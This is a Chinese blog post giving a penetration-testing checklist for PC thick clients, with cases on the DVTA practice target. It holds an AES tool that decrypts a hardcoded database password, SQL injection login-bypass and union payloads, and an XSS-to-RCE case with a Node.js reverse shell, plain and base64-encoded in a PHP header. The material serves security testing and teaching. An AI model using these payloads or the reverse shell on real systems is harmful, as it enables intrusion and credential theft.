渗透测试C客户端（C-S架构)checklist

亦凉 2024-04-01 16:07 66阅读 0赞

### 0x00 前言 ###

本项目主要针对pc客户端(cs架构)渗透测试，结合自身测试经验和网络资料形成checklist，如有任何问题，欢迎联系，期待大家贡献更多的技巧和案例。

### 0x01 概述 ###

PC客户端，有丰富功能的GUI，C-S架构。

![1745f07034a0b3025ac3f831aac43659.jpeg][]

### 0x02 开发语言 ###

C\#(.NET)，JAVA，DELPHI，C，C++......

### **0x03 协议** ###

TCP、HTTP(S)，TDS......

### **0x04 数据库** ###

oracle，mssql，db2......

### **0x05 测试工具** ###

//相关工具下载：[https://github.com/theLSA/hack-cs-tools][https_github.com_theLSA_hack-cs-tools]

dvta： pc客户端靶场

ida pro： 静态分析工具

ollydbg：动态分析工具

CFF Explorer：PE文件分析

PEID：查壳工具

exeinfope/studype：pe文件分析

wireshark：观察流量

tcpview：观察tcp流量

echo Mirage：可拦截tcp流量

burpsuite：http(s)抓包

proxifier：全局代理流量

procmon：文件和注册表监控

regshot：注册表变化对比

process Hacker：进程分析

RegfromApp：注册表监控

WSExplorer：岁月联盟进程抓包工具

strings：查看程序的字符串

.net\[反\]编译：

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java反编译

jad

jd-gui

jadx

dex2jar

在线版：[javare.cn][]

[www.javadecompilers.com][]

Reflexil：组装编辑器(可以作为ilspy插件)

Vcg：自动化代码审计工具

BinScope：二进制分析工具

### 0x06 代理设置 ###

大部分客户端没有代理配置功能，需要自行设置全局代理，如下两种方法：

1)IE-internet设置-连接-局域网设置。

2)proxifier --> proxy server/proxification rules

//http的流量可以结合burpsuite方便测试(proxy server设置为burp代理地址)。

![702b073f91a57df22fea900cbc8d7c19.jpeg][]

![e077bda50354903d87cb307c414d73bd.jpeg][]

![c96e0cdf72e83c9fbd89d9179d88a4f9.jpeg][]

### 0x07 测试点 ###

#### 0.信息收集 ####

编译信息，开发环境/语言，使用协议，数据库，ip，混淆/加密，是否加壳等。

案例0-CFF查看客户端信息(如编译环境)

dvta

![9b8bf61414082b72f599f0e9a9bb9f60.jpeg][]

#### 1. 逆向工程 ####

反编译，源代码泄露，硬编码key/password，加解密逻辑，角色判断逻辑(0-admin，1-normaluser)，后门等。

案例0-反编译获取加解密逻辑并编写解密工具

dvta

![59525fba28116bbe5866ce185950584d.jpeg][]

通过该逻辑和获取的信息

![89222931e73686cbdb7a8030e923ed33.jpeg][]

Encrypted Text: CTsvjZ0jQghXYWbSRcPxpQ==

AES KEY: J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV: fq20T0gMnXa6g0l4

编写解密工具

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data;

using System.Drawing;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

using System.Windows.Forms;

using System.Security.Cryptography;

namespace aesdecrypt

public partial class aesdecrypt : Form

public aesdecrypt()

InitializeComponent();

private void decrypt(object sender, EventArgs e)

String key = “J8gLXc454o5tW2HEF7HahcXPufj9v8k8”;

String IV = “fq20T0gMnXa6g0l4”;

String encryptedtext = “CTsvjZ0jQghXYWbSRcPxpQ==”;

byte\[\] encryptedBytes = Convert.FromBase64String(encryptedtext);

AesCryptoServiceProvider aes = new AesCryptoServiceProvider();

aes.BlockSize = 128;

aes.KeySize = 256;

aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);

aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);

aes.Padding = PaddingMode.PKCS7;

aes.Mode = CipherMode.CBC;

ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);

byte\[\] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);

String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);

Console.WriteLine(“\\n”);

Console.WriteLine(“\#\#\#\#\#\#\#\#\#\#Decryptig Database password\#\#\#\#\#\#\#\#\#\#\\n”);

Console.WriteLine(“Decrypted Database password:” + decryptedString+”\\n”);

Console.WriteLine(“\#\#\#\#\#\#\#\#\#\#Done\#\#\#\#\#\#\#\#\#\#\\n”);

//解密代码源自[https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/\#article][https_resources.infosecinstitute.com_damn-vulnerable-thick-client-app-part-5_article]

案例1-反编译修改代码逻辑让普通用户以管理员登录

dvta

1-Isadmin

0-Normaluser

改1为0即可判断为admin

![6b7268d4b8a90a788b2959750ce2abf9.jpeg][]

![fce3984a7ad39f1e2c572be7ea42b334.jpeg][]

#### 2. **信息泄露** ####

明文敏感信息，敏感文件(如安装目录下的xxx.config)。

注册表：利用regshot比较客户端运行(如登录)前后注册表差别。

开发调试日志泄露(如dvta.exe >> log.txt)

process hacker查看客户端内存中的明文敏感数据(如账号密码/key)。

strings直接查看客户端字符串(如ip信息)。

查看源代码(如github,gitee等)

案例0-配置敏感信息泄露

dvta

![4c31bc9cb2c36872f9cc6e1b14a1de04.jpeg][]

案例1-内存泄露数据库账号密码

dvta

![969a71101730517360cf9857e568dab2.jpeg][]

案例2-源代码含有硬编码ftp账号密码

dvta

![1a3cb40fe0e772800d3e21e80b0597e7.jpeg][]

案例3-开发调试日志泄露

dvta

![56f8477615974aa73facc47c1128d219.jpeg][]

案例4-某系统登录后本地保存账号密码

![52e613a68a3acdd5753c9d23124e8ff6.jpeg][]

//本案例来源于 [https://blog.csdn.net/weixin\_30685047/article/details/95916][https_blog.csdn.net_weixin_30685047_article_details_95916] [065][https_blog.csdn.net_weixin_30685047_article_details_95916]

#### 3. **传输流量** ####

wireshark/echo Mirage/burpsuite+nopeproxy/fillder/charles

ftp等协议明文传输的账号密码

SQL语句明文传输(如利用构造注入，越权等)

案例0-正方教务系统sql语句明文传输，返回明文数据

![084fdd93a61acf0eeeae59934262a355.jpeg][]

![3b7d3dc8cbabe53db145ae1d6e09f23e.jpeg][]

//本案例来源于wooyu

案例1-某系统登录处数据包返回数据库帐号密码

![f5aaca7b2985e4d22a51513188f1ebf4.jpeg][]

#### 4. 其他漏洞 ####

##### 用户名枚举 #####

案例0

![b431a0213992f2971ac92780c109a633.jpeg][]

![aa17ec1d0315ff9a6a392335393b2486.jpeg][]

##### 暴力破解 #####

如登录功能。

案例0

![cfc10c605571237f90dec3334360f000.jpeg][]

##### 弱口令 #####

可尝试admin 123456等。

##### 密码明文传输 #####

##### SQL语句暴露 #####

案例0

![1f82668f89791a5499958cb754c71186.jpeg][]

案例1

![54f886f14d471f00b66de6f8cc4021ae.jpeg][]

##### SQL注入 #####

如登录处，万能密码

xxx’ or ‘x’=’x

xxx’ or 1=1--

输入框处，构造闭合报错，如’、’)、%’)、order by 100--等。

利用显示位或报错注出数据，原理同web注入，不同数据库大同小异。

案例0-oracle注入

' union select null,null,(select user from dual),null,null,(select banner from sys.v\_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

![14abe02f7081900d9fdea4747c5ded98.jpeg][]

案例1-mssql注入

111') and (select user)>0--

![9bf704840234e2f900aa437d4bf1e2ea.jpeg][]

##### CSV注入 #####

如导出excel，输入1+1，导出后看是否为2。

##### XSS #####

如Electron，NodeWebKit等。

案例0-中国蚁剑xss到rce

环境：win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5

xss webshell：

<?php

header('HTTP/1.1 500 <img src=\# οnerrοr=alertx>');

![6eb10a5fa6998c527dea967db68c2685.jpeg][]

windows+node.js:

成功

var net = require("net"), sh = require("child\_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(6677, "127.0.0.1", function()\{client.pipe(sh.stdin);sh.stdout.pipe(client);

sh.stderr.pipe(client);\});

<?php

header("HTTP/1.1 500 Not <img src=\# οnerrοr='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=,base64).toString())'>");

![f53c1c3a701bba2afd8212b588d05761.jpeg][]

相关参考

[https://cloud.tencent.com/developer/article/1430899][https_cloud.tencent.com_developer_article_1430899]

##### 未授权 #####

案例0-正方教务系统数据库任意操作

知道ip即可接管数据库

![7723c6c53ecc26df5dc23b4841182bed.jpeg][]

//本案例来源于wooyun

##### 越权 #####

##### **溢出** #####

### **0x08 相关技巧** ###

1.  利用procexp --> properties --> tcp/ip 可以查看该客户端发起的网络连接，从而快速确定服务端地址
2.  wireshark直接过滤出服务器或数据库的ip或协议方便查看，如

ip.addr == 1.2.3.4&&http

1.  如果有数据库账号，可以用数据库监控sql语句操作(如sql server profiler)。

### **0x09 参考资料&&相关资源** ###

[https://resources.infosecinstitute.com][https_resources.infosecinstitute.com]

[1745f07034a0b3025ac3f831aac43659.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/423cac8c5b9f4f06a171beac29e0e344.jpeg
[https_github.com_theLSA_hack-cs-tools]: https://github.com/theLSA/hack-cs-tools
[javare.cn]: https://github.com/yaoxiaodai/CS-checklist/blob/master
[www.javadecompilers.com]: http://www.javadecompilers.com/
[702b073f91a57df22fea900cbc8d7c19.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/9c56a69218c74f08980b73f65046db22.jpeg
[e077bda50354903d87cb307c414d73bd.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/1c70c1daa3a8468f9166861af90fad99.jpeg
[c96e0cdf72e83c9fbd89d9179d88a4f9.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/08a072b773574674979c381426bdc4e6.jpeg
[9b8bf61414082b72f599f0e9a9bb9f60.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/e017676e764d446d852a6ce582735da8.jpeg
[59525fba28116bbe5866ce185950584d.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/c8fd58e0c5af4b20abac1e713bf15f86.jpeg
[89222931e73686cbdb7a8030e923ed33.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/0c6919b0762c447e8a630d4f3d658b2c.jpeg
[https_resources.infosecinstitute.com_damn-vulnerable-thick-client-app-part-5_article]: https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article
[6b7268d4b8a90a788b2959750ce2abf9.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/31656305517740b0ac6bf3b6108c58a8.jpeg
[fce3984a7ad39f1e2c572be7ea42b334.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/209b167e6f264fa4a35d0b3155aade53.jpeg
[4c31bc9cb2c36872f9cc6e1b14a1de04.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/4ccc574c8b6b443fb0b6f3ab05212ac8.jpeg
[969a71101730517360cf9857e568dab2.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/ca17072e84764e31ab588a8ddcfdbe5f.jpeg
[1a3cb40fe0e772800d3e21e80b0597e7.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/7222c6d313564258a39cab7fe1946e18.jpeg
[56f8477615974aa73facc47c1128d219.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/694f36e64b4b42b7b166fa946f61eb71.jpeg
[52e613a68a3acdd5753c9d23124e8ff6.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/579c03e1d03f4676a97b4913075d92f0.jpeg
[https_blog.csdn.net_weixin_30685047_article_details_95916]: https://blog.csdn.net/weixin_30685047/article/details/95916065
[084fdd93a61acf0eeeae59934262a355.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/017b7ee118384cb49bcb1b177b1958e0.jpeg
[3b7d3dc8cbabe53db145ae1d6e09f23e.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/acbcfac2635d4eac88f07bb4acbf6e31.jpeg
[f5aaca7b2985e4d22a51513188f1ebf4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/f941fd26ad3440d181865f12aac08595.jpeg
[b431a0213992f2971ac92780c109a633.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/555ed7894064430b9519be75f2f1f0d9.jpeg
[aa17ec1d0315ff9a6a392335393b2486.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/87d51319f8d54d0c9c6e18293b41e51b.jpeg
[cfc10c605571237f90dec3334360f000.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/92661ed35c984689a1fded45436551fe.jpeg
[1f82668f89791a5499958cb754c71186.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/c5e3e059f9434619a2870325cfad229d.jpeg
[54f886f14d471f00b66de6f8cc4021ae.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/e6170b50c8ec4ef78e8e9900bebfd2b0.jpeg
[14abe02f7081900d9fdea4747c5ded98.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/083f769ad8b8459297b6824c731d0fa6.jpeg
[9bf704840234e2f900aa437d4bf1e2ea.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/de3175fc947e4cfb9a9f1c747fa5ed96.jpeg
[6eb10a5fa6998c527dea967db68c2685.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/882a5fcd4ed24380a9cea52f0be42166.jpeg
[f53c1c3a701bba2afd8212b588d05761.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/114bb0609fc148eebe93c6171542cd6a.jpeg
[https_www.anquanke.com_post_id_176379]: https://www.anquanke.com/post/id/176379
[http_blog.knownsec.com_2018_11_E5_8D_B0_E8_B1_A1_E7_AC_94_E8_AE_B0-windows-_E5_AE_A2_E6_88_B7_E7_AB_AF-6-15-_E6_9C_AC_E5_9C_B0_E6_96_87_E4_BB_B6_E8_AF_BB_E5_8F_96_E5_92_8C_E8_BF_9C_E7_A8_8B_E5_91_BD_E4_BB_A4_E6_89_A7_E8_A1_8C]: http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
[https_www.secpulse.com_archives_53852.html]: https://www.secpulse.com/archives/53852.html
[https_shuimugan.com_bug_view_bug_no_193117]: https://shuimugan.com/bug/view?bug_no=193117
[7078283a403bc88eca75d6d0a1757be4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/2a309a4439504f9ba7be609a590b863c.jpeg
[e881a7ed4232b451968c16480d9ae49b.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/54dade1ba5d4483999696192c8408245.jpeg
[https_cloud.tencent.com_developer_article_1430899]: https://cloud.tencent.com/developer/article/1430899
[7723c6c53ecc26df5dc23b4841182bed.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/4bbc1185f41d4a559c1ce006dd43d6ce.jpeg
[https_resources.infosecinstitute.com]: https://resources.infosecinstitute.com/